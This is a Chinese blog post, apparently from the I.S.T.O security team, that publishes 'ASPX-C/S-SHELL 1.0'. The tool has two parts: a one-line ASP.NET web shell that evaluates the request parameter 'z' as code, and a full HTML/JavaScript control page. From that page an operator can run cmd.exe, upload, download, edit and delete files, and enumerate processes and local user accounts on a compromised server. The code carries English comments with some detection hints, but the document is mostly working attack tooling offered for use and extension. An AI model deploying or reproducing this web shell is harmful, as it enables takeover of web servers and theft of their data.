ASPX-C/S-SHELL 1.0

鬼仔注:这两天跑去参加慕容小雨的婚礼了,所以一直没更新,这两天见到很多朋友,有空写下。

Author : kj021320
Team : I.S.T.O

信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)

服务器端 一句话为

<%-- Server side of this shell, as a single line. The page directive switches the page to JScript.NET and sets
     validateRequest="false", which disables ASP.NET request validation for this page only. The body passes the
     raw request parameter "z" to eval(..., "unsafe") and writes whatever that evaluates to into the response,
     so the source text supplied in "z" runs inside the ASP.NET process hosting the page (HttpRequest.Item
     looks the name up in query string, form, cookies and server variables, so the transport is not fixed).
     The parameter name "z" is the value the client page below expects in its KEY field.
     Detection note: the pairing of validateRequest="false" with eval(Request.Item[...],"unsafe") in a
     one-line .aspx file is the signature to match in web-root content scans and file-integrity monitoring. --%>
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["z"],"unsafe"));%>

这个一句话不用说了!我之前已经发表文章讲解过!

client端HTML页面代码如下

<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=gb2312">
<title>I.S.T.O ASPX-C/S-SHELL 1.0 by kj021320</title>
<style type="text/css">
body,td{font-size: 12px;}
table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');}
input,select{font-size:12px;}
body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}
td{white-space:nowrap;}
a{color:black;text-decoration:none;}
</style>
<!--
Author: kj021320
Team : I.S.T.O
Description:

file/folder copy,move and view
file down , edit , delete , upload and run
server config and user information

U can extend the ASPX-C/S-SHELL function and use setCmdText(the js function) to commit the command
-->
<script language="javascript">
// Builds the server-side JScript.NET that copies file s to t (System.IO.File.Copy) and stores it in the hidden
// command field via setCmdText(); nothing runs until the address form is submitted to the shell URL.
// Only backslashes are doubled so the paths survive being embedded in a JScript string literal; no other
// character is escaped, so a double quote in either path would break the generated literal.
function copyFile(s,t){
// Windows path separators must be doubled to survive one level of JScript string-literal unescaping on the server.
s=s.replace(/\\/g,"\\\\");
t=t.replace(/\\/g,"\\\\");
setCmdText('var s="'+s+'",t="'+t+'";System.IO.File.Copy(s,t);');
}
// Builds server-side code that starts the program at path s with argument string a
// (System.Diagnostics.Process, UseShellExecute=false, standard output redirected), blocks in
// StandardOutput.ReadToEnd() until the child closes its stdout, and returns the output wrapped in <pre>.
// The wrapper closes with a second "<pre>" rather than "</pre>"; left as-is here.
// Defender note: server side this is the web worker process spawning a child process; the RunFile row in the
// page body pre-fills s with c:\windows\system32\cmd.exe, so an unexpected cmd.exe child of the worker is the
// thing to alert on.
function runFile(s,a){
// Backslashes doubled for the same reason as in copyFile(); nothing else is escaped.
s=s.replace(/\\/g,"\\\\");
a=a.replace(/\\/g,"\\\\");
setCmdText('var s="'+s+'",a="'+a+'";var p=new System.Diagnostics.Process();p.StartInfo.UseShellExecute=false;p.StartInfo.RedirectStandardOutput=true;p.StartInfo.FileName=s;p.StartInfo.Arguments=a;p.Start();var o=p.StandardOutput.ReadToEnd();"<pre>"+o+"<pre>"');
}
// Builds server-side code that reads file f with a StreamReader and returns an HTML form containing: the path in
// an input named fname, the file contents (Server.HtmlEncode'd) in a textarea named t, and a hidden input whose
// NAME is the current KEY value (address.KEY.value, read from the <form name=address> at click time) and whose
// VALUE is a second script. When that form's save button posts back, the server evaluates the second script,
// which writes Request.Item["t"] to the path in Request.Item["fname"] with a StreamWriter and answers "OK".
// The nested \\" and \' sequences exist because the text passes through two evaluations: this page's JScript
// literal, then the server's eval() of the submitted command.
function editFile(f){
f=f.replace(/\\/g,"\\\\");
var code='var stream:System.IO.TextReader,filename,os="",thePath="'+f+'",code;stream=new System.IO.StreamReader(thePath);os=stream.ReadToEnd();os="<form method=post><input name=fname value="+thePath+"><input type=submit name=s value=save><textarea name=t rows=30 style=width:100%;>"+Server.HtmlEncode(os)+"</textarea><input name=\\"'+address.KEY.value+'\\" type=hidden value=\'var stream:System.IO.TextWriter;stream=new System.IO.StreamWriter(Request.Item[\\"fname\\"]);stream.Write(Request.Item[\\"t\\"]);stream.Close();stream=null;Response.Write(\\"OK\\")\'></form>";stream.Close();stream=null;os;';
setCmdText(code);
}
// Builds server-side code that saves the uploaded part named "myfile" (Request.Files) to path f, doing nothing
// when the request carries no files. The matching <input type=file name=myfile> and the multipart/form-data
// enctype are on the address form in the page body, so the file travels in the same POST as the command.
function upfile(f){
f=f.replace(/\\/g,"\\\\");
setCmdText('var files=Request.Files;if(files.Count!=0)files.Get("myfile").SaveAs("'+f+'");');
}
// Builds server-side code that streams file f back as a download: clears the response, opens the file with a
// FileStream, sets Content-Disposition: attachment (filename = text after the last backslash, UrlEncode'd with
// "+" mapped back to a space), Content-Length and application/octet-stream, copies the file to
// Response.OutputStream in 1024-byte reads, then Response.End(). The "\\\\" inside lastIndexOf is four
// backslashes here so that, after this page's literal and the server's literal are both unescaped, the server
// searches for a single backslash.
function downFile(f){
f=f.replace(/\\/g,"\\\\");
setCmdText('var stream,filename,bs,os,thePath="'+f+'";Response.Clear();bs=new byte[1024];stream=new System.IO.FileStream(thePath,System.IO.FileMode.Open);filename=thePath.substr(thePath.lastIndexOf("\\\\")+1);Response.AddHeader("Content-Disposition","attachment; filename="+Server.UrlEncode(filename).replace("+"," "));Response.AddHeader("Content-Length",stream.Length);Response.Charset="UTF-8";Response.ContentType="application/octet-stream";os=Response.OutputStream;var i=stream.Read(bs,0,bs.Length);while(i>0){os.Write(bs,0,i);i=stream.Read(bs,0,bs.Length);}os=null;Response.Flush();stream.Close();stream=null;Response.End();');
}
// Builds server-side code that reports the current process (Process.GetCurrentProcess), each of its threads, and
// every process returned by Process.GetProcesses(proc.MachineName), as <br>-separated name:value lines produced
// by two nested typed helpers (getProcessThreadInfo, getProcessInfo). MaxWorkingSet/MinWorkingSet are read
// inside an empty try/catch, so they are silently skipped on any exception.
// NOTE(review): the thread loop passes the for-in variable p straight to getProcessThreadInfo, while the process
// loop indexes ps[p]; whether both forms are right depends on how JScript.NET enumerates these collections and
// is not verified here.
function ProcessInfo(){
setCmdText('var o;var proc=System.Diagnostics.Process.GetCurrentProcess();o="<h4>CurrentProcessInfor:</h4>";o+=getProcessInfo(proc);var ptc=proc.Threads;for(var p in ptc){o+="<br>"+getProcessThreadInfo(p);}o+="<h4>OtherProcessInfor:</h4>";var ps=System.Diagnostics.Process.GetProcesses(proc.MachineName);for(var p in ps){o+="<br>"+getProcessInfo(ps[p]);}function getProcessThreadInfo(pt:System.Diagnostics.ProcessThread):String{var o="<br>Id:"+pt.Id; o+="<br>BasePriority:"+pt.BasePriority; o+="<br>CurrentPriority:"+pt.CurrentPriority;o+="<br>Site:"+pt.Site;o+="<br>StartAddress:"+pt.StartAddress;o+="<br>ThreadState:"+pt.ThreadState;return o;}function getProcessInfo(proc:System.Diagnostics.Process):String{var o="<br>ProcessName:"+proc.ProcessName;o+="<br>BasePriority:"+proc.BasePriority;o+="<br>MachineName:"+proc.MachineName;o+="<br>MainWindowTitle:"+proc.MainWindowTitle;try{o+="<br>MaxWorkingSet:"+proc.MaxWorkingSet;o+="<br>MinWorkingSet:"+proc.MinWorkingSet;}catch(e){}o+="<br>NonpagedSystemMemorySize:"+proc.NonpagedSystemMemorySize;o+="<br>PagedMemorySize:"+proc.PagedMemorySize;o+="<br>PagedSystemMemorySize:"+proc.PagedSystemMemorySize;o+="<br>PeakPagedMemorySize:"+proc.PeakPagedMemorySize;o+="<br>PeakVirtualMemorySize:"+proc.PeakVirtualMemorySize;o+="<br>PeakWorkingSet:"+proc.PeakWorkingSet;o+="<br>PrivateMemorySize:"+proc.PrivateMemorySize;o+="<br>VirtualMemorySize:"+proc.VirtualMemorySize;o+="<br>WorkingSet:"+proc.WorkingSet;return o;}');
}
// Builds server-side code that enumerates local accounts through the ADSI WinNT provider: GetObject("WinNT://.")
// with Computer.Filter set to "User" and then "Group", and per user GetObject("WinNT://./<name>,user") to read
// description, password/lockout/expiry state, profile, login script, home directory and last login/logoff.
// Each UserFlags check compares with == against one value (65536, 64, 256) — an equality test, not a bitmask
// test — so those three lines report true only when that is the sole flag set. Per-user failures are swallowed
// by an empty catch. Defender note: this would be expected to surface as local account enumeration originating
// from the web server host.
function userInfo(){
setCmdText('function getUserInfo(strUser:String):String{var User,Flags,o="";try{ User=GetObject("WinNT://./"+strUser+",user");with(User){o+="<br>Description:"+User.Description+"<br>";o+="PasswordExpired:"+Get("PasswordExpired")+"<br>";Flags=Get("UserFlags");o+="passover:"+(Flags==65536)+"<br>";o+="CannotChangPass:"+(Flags==64)+"<br>";o+="GlobalAccount:"+(Flags==256)+"<br>";o+="PasswordMinimumLength:"+PasswordMinimumLength+"<br>";o+="PasswordRequired:"+PasswordRequired+"<br>";o+="AccountDisabled:"+AccountDisabled+"<br>";o+="IsAccountLocked:"+IsAccountLocked+"<br>";o+="Profile:"+Profile+"<br>";o+="LoginScript:"+LoginScript+"<br>";o+="HomeDirectory:"+HomeDirectory+"<br>";o+="HomeDirDrive:"+Get("HomeDirDrive")+"<br>";o+="AccountExpirationDate:"+AccountExpirationDate+"<br>";o+="BadLoginCount:"+BadLoginCount+"<br>";o+="LastLogin:"+LastLogin+"<br>";o+="LastLogoff:"+LastLogoff+"<br>";}}catch(e){}return o;}function Userinfo():String{var User,Group,Computer,o="";Computer=GetObject("WinNT://.");Computer.Filter=new Array("User");o+="User:<hr>";for(User in Computer){o+="<li>"+User.Name+"</li>";o+=getUserInfo(User.Name);o+="<hr>";}o+="UserGroup:<hr>";Computer.Filter=new Array("Group");for(Group in Computer){o+="<li>"+Group.Name+"</li>"+Group.Description+"<hr>";}return o;}Userinfo();');
}
// Builds server-side code that deletes file s (System.IO.File.Delete). As elsewhere, only backslashes are
// doubled before the path is spliced into the generated string literal.
function delFile(s){
s=s.replace(/\\/g,"\\\\");
setCmdText('var s="'+s+'";System.IO.File.Delete(s);');
}
// Builds server-side code that moves s to t, using File.Move when s is an existing file and Directory.Move when
// it is an existing directory (both checks run, but a path can only satisfy one). Paths are backslash-doubled
// only, as in copyFile().
function moveFile(s,t){
s=s.replace(/\\/g,"\\\\");
t=t.replace(/\\/g,"\\\\");
setCmdText('var s="'+s+'",t="'+t+'";if(System.IO.File.Exists(s))System.IO.File.Move(s,t);if(System.IO.Directory.Exists(s))System.IO.Directory.Move(s,t);');
}
// Builds server-side code that returns host facts: Environment.MachineName, UserDomainName, UserName (the
// account the page runs as), OSVersion, and the server's LOCAL_ADDR server variable.
function Info(){
setCmdText('var o="";o+="<br>MachineName:"+Environment.MachineName;o+="<br>UserDomainName:"+Environment.UserDomainName;o+="<br>UserName:"+Environment.UserName;o+="<br>OS:"+Environment.OSVersion;o+="<br>ADDRESS:"+Request.ServerVariables("LOCAL_ADDR");o;');
}
// Runs from the "link" button: points the address form at the shell URL typed in the URL field, renames the
// hidden command input to the KEY value so the POSTed parameter name matches what the server one-liner reads
// (the sample server page reads Request.Item["z"], i.e. KEY would be "z"), and queues Server.MapPath(".") —
// the physical path of the page's directory — as the command. Top is bound to the address form by the trailing
// script after </html>.
function check(){
Top.action=Top.URL.value;
setCmdName(Top.KEY.value);
setCmdText("Server.MapPath(\".\")");
}
// Builds server-side code that lists directory p: "DIR:" followed by Directory.GetDirectories(p), then "FILE:"
// followed by Directory.GetFiles(p), <br>-separated. When p does not exist only the "DIR:<br>" header is
// returned (the FILE section is inside the Exists check).
function listFolder(p){
p=p.replace(/\\/g,"\\\\");
setCmdText('var p="'+p+'",output="";output+="DIR:<br>";if(System.IO.Directory.Exists(p)){var ds=System.IO.Directory.GetDirectories(p);for(var i in ds)output+=ds[i]+"<br>";output+="FILE:<br>";var fs=System.IO.Directory.GetFiles(p);for(var i in fs)output+=fs[i]+"<br>";}output;');
}
// Renames the hidden command input to n; the name becomes the POST parameter the server page looks up.
function setCmdName(n){
var field=getCmd();
field.name=n;
}
// Places str in the hidden command input; it is sent as that input's value when the address form submits.
function setCmdText(str){
var field=getCmd();
field.value=str;
}
// Returns the hidden input with id="Command" (the cmd field of the address form) that the helpers write into.
function getCmd(){
var cmdField=document.getElementById("Command");
return cmdField;
}
</script>
</head>
<body>
<table width=100% height=100% border=0 bgcolor=menu>
<tr><td height=30 colspan=2>
<table width=100% height=25 border=0>
<form name=address method=post target=Display enctype="multipart/form-data" >
<tr><td width=60 align=center>SHELL:</td><td style=width:80%>
<input name=URL style=width:90% value="http://127.0.0.1/kj021320.aspx"> KEY:
<input name=KEY style=width:5%>
<input name=cmd type=hidden id=Command>
</td><td align=center><input name=Submit onClick="check();" type=submit value=link>
</td></tr>
<tr align=center><td>path:</td><td><input name=path style=width:100%></td><td><input name=view type=submit value=view onclick="listFolder(path.value);"></td></tr>

<tr align=center><td>Opt:</td><td>source:<input name=sname style=width:40%>target:<input name=tname style=width:40%></td><td> <input type=submit name=cp value=copy onclick="copyFile(sname.value,tname.value);"><input type=submit name=mv value=move onclick="moveFile(sname.value,tname.value);"></td></tr>

<tr align=center><td>FileOpt:</td><td>Filepath:<input name=fp style=width:80%></td><td><input type=submit name=down value=down onclick="downFile(fp.value);"><input type=submit name=edit onclick="editFile(fp.value);" value=edit><input type=submit name=del value=del onclick="delFile(fp.value);"></td></tr>

<tr align=center><td>RunFile:</td><td>Filepath:<input name=rfp value="c:\windows\system32\cmd.exe" style=width:40%>Args:<input name=args style=width:40%></td><td><input type=submit name=run value=run onclick="runFile(rfp.value,args.value);"></td></tr>

<tr align=center><td>Info:</td><td><input type=submit name=req value=Info onclick="Info();"><input type=submit name=proc value=Process onclick="ProcessInfo();"><input type=submit name=userInf value=userInfo onclick="userInfo();"></td><td></td></tr>

<tr align=center><td>upfile:</td><td><input type=file name=myfile style=width:40%>save:<input type=text name=safile style=width:40%></td><td><input type=submit name=up value=upfile onclick="upfile(safile.value);"></td></tr>
</form></table></td></tr><tr><td>
<iframe name=Display width=100% src=http://blog.csdn.net/I_S_T_O/ height=100% scrolling=yes></iframe>
</td></tr></table>
</body></html>
<script>
// Top is the <form name=address> in the top window; check() uses it for the action URL and the URL/KEY fields.
// It is assigned in this trailing script block (after </html>), presumably so the form already exists when it runs.
var Top=top.address;
</script>

基本上平时ASPXSHELL的文件操作功能我都加入进去了,注册表跟数据库操作的没写!多加了个进程浏览、用户组浏览,具体更多的功能迟点再更新吧~具体更新信息请关注I.S.T.O 开源项目区 http://blog.csdn.net/I_S_T_O/category/325894.aspx 。没有实现的功能,有兴趣的朋友可以接力 :)
